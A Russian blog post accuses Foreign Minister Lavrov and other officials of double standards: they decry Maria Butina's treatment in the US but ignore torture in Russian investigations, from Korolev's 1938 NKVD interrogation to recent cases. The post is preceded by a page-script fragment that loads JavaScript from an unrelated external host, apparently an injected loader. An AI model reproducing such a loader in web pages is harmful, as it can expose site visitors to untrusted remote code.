, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Почему Сергей Лавров молчит о пыточном судопроизводстве в России?

14 Дек

Неожиданно о пытках в США заговорил Министр иностранных дел России Сергей Лавров.

Так, он  заявил, что понимает решение Марии Бутиной пойти на сделку с американским правосудием, поскольку к ней «применяются своеобразные пытки». Он утверждает: «Весь смысл этой сделки заключался в том, чтобы выторговать возможность как можно поскорее освободиться и вернуться на родину».

При этом ничего о содеянном Бутиной и предъявленном ей обвинении.

Министр иностранных дел говорит: «У меня есть основания полагать, что цель этих условий, которые ей были созданы, заключалась в том, чтобы сломать ее волю и вынудить ее, по сути дела, признаться в том, чего она, скорее всего, не совершала».

Можно порадоваться за такого министра, публично заявившего о «своеобразных пытках» в США, но, что сделал Лавров для того, чтобы подобного не было в России?

Разве Лаврову неизвестно о том, как у создателя космической отрасли С.П. Королёва, выбивали показания  те, кто осуществлял уголовное преследование от имени государства?

Разве  безнаказанность  за содеянное  над С.П. Королёвым и отсутствие покаяния за это, у осуществляющих государственную власть сегодня, не есть причина самовластия чиновников?

Не потому ли уже в новой России 25 лет являются безуспешными  попытки сделать Человека высшей ценностью?

В интервью «Российской газете» (11.01.2007)  дочь С.П. Королёва сказала: «Я читала уголовное дело.  Доноса как такового не было. Есть «акт экспертизы» о работе Сергея Королева, который подписали четыре сотрудника института. Среди подписавших — Андрей Костиков, будущий директор института. Документ просто уничтожающий».

27 июня 1938 года в половине двенадцатого ночи в дверь 11-й квартиры Королевых на Конюшковской ул., д. 28 в Москве громко постучали: «Открывайте! НКВД». Пришли двое. Обыск продолжался всю ночь. Перевернув весь дом, опечатав одну комнату и забрав нужные бумаги, чекисты увели хозяина с собой. Во Внутреннюю тюрьму НКВД на Лубянке.

Утром 28 июня начался первый допрос, о чем свидетельствует копия протокола в книге дочери Сергея Павловича — Наталии Королевой. Допрашивал оперуполномоченный, сержант госбезопасности Быков. На первый вопрос, знает ли  арестованный о причине ареста, Сергей Павлович сказал просто: «Нет, не  знаю». В ответ мат, смачный плевок в лицо, удар сапогом в пах. Очнувшись, Королев увидел человека в белом халате. Проверив пульс, тот помог ему встать и  сказал: «Страшного ничего нет».

После этого следователь сообщил ему, что он будет стоять на  «конвейере» до тех пор, пока не подпишет показаний. Сергей Павлович стоял до вечера. Есть и пить не давали; спать не разрешали. Вечером пришел другой следователь — лейтенант госбезопасности Михаил Шестаков. Простояв всю ночь, рано утром, допрашиваемый вновь увидел сержанта Быкова…

Побои сержанта Быкова С.П. Королёв выдержал, не стал себя оговаривать, а допроса «доброго» следователя не выдержал. «Добрый следователь» говорил: «У тебя красивая молодая жена, Так вот, мы одну буквочку опустим, и она будет не  Королёва, а Королёв, и мы бросим её к  зэкам на неделю. Дочка у тебя, ей 3 годика — тоже найдём куда её деть». После этого С.П. Королёв  сказал: «И я подписал протокол…».

Опубликованные в АиФ № 1−2, 2017 г. с. 10−11 воспоминания  космонавта А. Леонова о  С.П. Королёве дополняют события, связанные с предательством и оговором «коллегами».

Но безнаказанность за содеянное в прошлом, позволяет и нынешним «служителям закона» осуществляющим уголовное преследование от имени государства, продолжать пыточное производство, изобретая новые способы его осуществления.

Об этом на протяжении многих лет убедительно рассказывал http://lgz.ru/article/-19−6462−14−05−2014/chelovek-na-kolenyakh/  в «Литературной газете» И. Гамаюнов, спрашивая: «Кто остановит пыточный конвейер следствия, вынуждающий задержанных брать не себя чужую вину?»

Никто, из лиц, осуществляющих государственную власть, даже не пытался ответить на этот вопрос.

Глухи оказались и к фактам применения http://versia.ru/articles/2013/nov/18/delo_saida_amirova   пыток по делу мэра Махачкалы Саида Амирова.

«Назначение» обвиняемым, как правило, осуществляется под насилием со стороны работников правоохранительных органов, пытками, другим жестоким и унижающим человеческое достоинство обращением.

Всему миру стали известны методы «назначения» обвиняемым  садистами в мундирах  ОВД «Дальний»  в Казани. http://www.rg.ru/sujet/4582/ .

Но никаких возмущений таким судопроизводством Министр  иностранных дел России Сергей Лавров не высказывал.

На протяжении нескольких месяцев официальный представитель МИД России Мария Захарова комментировала в СМИ, события, связанные с  российской гражданки Марией Бутиной, арестованной в США, рассказывая россиянам, как насильно Бутину заставили пройти через унизительные,  жуткие процедуры досмотра. Отобрали все вещи, включая одежду, еду, предметы личной гигиены, продержали в карантинной камере 12 часов без еды.

Для каждого обывателя процедуры досмотра являются жуткими и кажутся унизительными, но порядок их проведения, как и Устав в армии, написан кровью тех, кто игнорировал его чёткое исполнение.

Вспомним недавние события в Московском областном суде, когда подсудимые разоружили конвой и открыли стрельбу.

Возможно, от имени всех россиян, как это было при власти КПСС,  Захарова заявляла: «Мы вновь требуем оказать Бутиной всю необходимую помощь и закрыть политически мотивированное уголовное дело. Мы надеемся, что международное сообщество обратит внимание на унижающие человеческое достоинство действия и произвол правоохранительных органов США в отношении россиянки».

Нам пытались представить Бутину жертвой обострившейся русофобии, не объясняя, что же на самом деле произошло.

Как оказалось, американский Минюст обвиняет Бутину в «инфильтрации (проникновении) организаций, имеющих влияние на американскую политику, с целью продвижения интересов Российской Федерации».

Обвинения предъявлены по разделу 18, частям 951 и 371 Свода законов США. Параграф 371 описывает «сговор, направленный на совершение преступления или на обман в отношении Соединенных Штатов».

Параграф 951 касается работы «агентов иностранных правительств». В нем указано, что лица, работающие на территории США под контролем иностранных правительств, обязаны уведомлять генерального прокурора США о своей деятельности.

В расследовании деятельности Бутиной принимало участие ФБР, которое получило доступ к ее переписке и содержимому ее телефона.

В заключении спецагента ФБР Кевина Хельсона, приложенного к обвинению в отношении Бутиной, ей приписано пособничество в создании тайного канала связи между элитами Республиканской партии и российским руководством.

История с Бутиной не может не вызывать сожаления, но чего стоят эти сожаления тех, кто взялся осуществлять государственную власть в России, и ничего не делает для устранения пыточного судопроизводства в своей стране?

Уполномоченная по правам человека в России Татьяна Москалькова назвала бесчеловечными условия содержания Бутиной в тюрьме в США. Но разве можно назвать человечным содержания в СИЗО России, когда за отказ поставить подпись в журнале по уборке камеры, обвиняемого могут поместить в карцер на 15 суток, лишив свидания, переписки, чтения газет и нормального питания?

Разве Москалькова не  знает, что даже УПК РФ, не содержит каких либо карательных мер для обвиняемого, который отказался ставить свою подпись на процессуальных документах, составленных с его участием.

Умалчивание и жизнь по лжи, двойным стандартам, когда у них на Западе так делать нельзя, а у нас в России можно, продолжается и это не приносит доверие тем, кому единственный источник власти, многонациональный народ, доверил осуществлять государственную власть.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.